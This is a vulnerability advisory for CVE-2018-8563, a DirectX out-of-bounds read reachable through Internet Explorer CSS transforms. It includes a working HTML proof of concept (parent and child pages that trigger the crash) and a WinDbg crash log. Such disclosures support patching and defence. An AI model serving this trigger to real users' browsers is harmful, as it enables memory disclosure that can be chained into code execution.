A memory corruption vulnerability exists in Microsoft DirectX. The corruption happens as a result of the incorrect handling of text, while running CSS tranformations, resulting in an out-of-bounds-read. It is possible to trigger this vulnerability remotely via Internet Explorer. An attacker can use this vulnerability to disclose memory of a victim’s machine. Generally, such vulnerability is chained with a Remote Code Execution vulnerability and used to bypass common defenses.

Date Released: 14/11/2018
CVE: CVE-2018-8563
Author: Scott Bell
Vendor Website: http://www.microsoft.com/
Affected Software: Microsoft DirectX

Proof of Concept

The following HTML files can be used to reproduce the vulnerability:

parent.html

<html>
<iframe height="400" width="400" src="child.html"></iframe>
</html>

child.html

<html>
<head>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
<script>
function fuzz(){
try{bdo_element = document.createElement("bdo")}catch(e){}
try{document.body.appendChild(bdo_element);}catch(e){}
try { bdo_element.runtimeStyle.cssText = "box-shadow:3ch 1 2147483649rem 1 ;"}catch (e){}	
try { bdo_element.innerText="&#8113;&#3453;&#7307;&#8779;&#2205;&#0875;&#4500;&#6192;&#9052;&#6115;"}catch (e){}
}
</script>
</head>
<body style="transform: scaleX(5) matrix(-6,6133979,0,7,5,-256);" onload='fuzz();'>
</body>
</html>

Executing the above HTML in Internet Explorer with a debugger attached results in the following crash:

(444.808): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=06fbb4d9 ebx=00000031 ecx=f9000002 edx=064f0080 esi=06381fa0 edi=05f87f60
eip=7ff984a3 esp=0477e860 ebp=0477ea10 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
7ff984a3 660f3a22048a01  pinsrd  xmm0,dword ptr [edx+ecx*4],1 ds:0023:ea4f0088=????????
1:031> k
ChildEBP RetAddr  
WARNING: Frame IP not in any known module. Following frames may be wrong.
0477ea10 7ff98011 0x7ff984a3
0477ea2c 6731e5a8 0x7ff98011
0477ea38 6731e0e6 D3D10Warp!ProcessorThreadSpecificData::ExecuteProgram_JIT+0x18
0477ea58 6731eaa0 D3D10Warp!ProcessorThreadSpecificData::ProcessPixels+0xd6
0477eac0 672f26c7 D3D10Warp!PixelJITProcessor::ProcessPixels+0x30
0477eadc 672f22f8 D3D10Warp!PixelJITGeometryRasterizer::Flush+0x97
0477eb14 67363aa9 D3D10Warp!PixelJITGeometryRasterizer::RasterizeComplexScan+0x48
0477eb34 67363a2e D3D10Warp!CAntialiasedFiller::GenerateOutput+0x39
0477eb68 67363383 D3D10Warp!CAntialiasedFiller::FillEdges+0x5de
0477ebb0 67362efa D3D10Warp!CAntialiasedFiller::RasterizeEdges+0x323
0477f6e0 672f2255 D3D10Warp!WarpGeometry::Rasterize+0x24a
0477f6fc 672f27e8 D3D10Warp!PixelJITGeometryRasterizer::Rasterize+0xe5
0477f784 672cb956 D3D10Warp!PixelJITRasterizeGeometry+0xe8
0477f7d4 672cad05 D3D10Warp!RasterizationStage::Rasterize_GEOMETRY+0x276
0477f7f4 672cac85 D3D10Warp!RasterizationStage::RasterizeBufferNoPixelShader+0x45
0477f818 672c7513 D3D10Warp!RasterizationStage::RasterizeBuffer+0xc5
0477f850 672de7d2 D3D10Warp!Task_Rasterize+0x253
0477f980 672de4ec D3D10Warp!Task::ExecuteTask+0x132
0477f998 76f326c5 D3D10Warp!ThreadPool::WorkCallBack+0x6c
0477f9bc 76f506d0 ntdll!TppWorkpExecuteCallback+0x10f
0477fb0c 7673efac ntdll!TppWorkerThread+0x562
0477fb18 76f83628 kernel32!BaseThreadInitThunk+0xe
0477fb58 76f835fb ntdll!__RtlUserThreadStart+0x70
0477fb70 00000000 ntdll!_RtlUserThreadStart+0x1b